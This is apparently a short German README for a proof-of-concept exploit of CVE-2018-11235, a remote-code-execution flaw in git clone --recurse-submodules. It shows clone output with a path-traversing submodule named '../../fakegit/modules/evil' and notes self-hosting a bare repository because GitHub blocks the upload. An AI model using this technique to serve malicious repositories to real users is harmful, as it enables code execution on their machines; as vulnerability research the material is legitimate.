
PoC-Exploit für CVE-2018-11235, der RCE bei git clone --recurse-submodules ermöglicht
repository: http://REDACTED/2018-11235_PoC.git/
return:
Submodule 'aaa' (https://repo1) registered for path 'aaa'
Submodule '../../fakegit/modules/evil' (https://repo2) registered for path 'evil'
Submodule path 'aaa': checked out '9c48e0a785dec84cb252677a8a7d55feaeac056c'
Submodule path 'evil': checked out '9c48e0a785dec84cb252677a8a7d55feaeac056c'
Da GitHub das Hochladen des PoC verhindert, müssen Sie Ihr eigenes Repository hosten. Ich habe das gemacht, indem ich ein lokales Repository mit git init . --bare erstellt habe.